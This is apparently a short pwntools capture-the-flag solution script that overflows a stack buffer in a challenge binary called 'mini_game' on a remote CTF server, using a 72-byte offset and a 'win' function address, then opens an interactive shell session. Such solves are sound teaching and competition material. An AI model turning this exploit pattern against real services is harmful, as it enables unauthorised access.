#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF('./mini_game', checksec=False)

#p = process(elf.path)
p = remote('offsec.m0lecon.it', 13509)
# Your exploit here
OFFSET = 72
win = 0x4011fb
payload = flat(
    b'A'*OFFSET,
    win,
)
p.send(payload)
#p.send(b'cat flag\n')
#p.recv()
p.interactive()
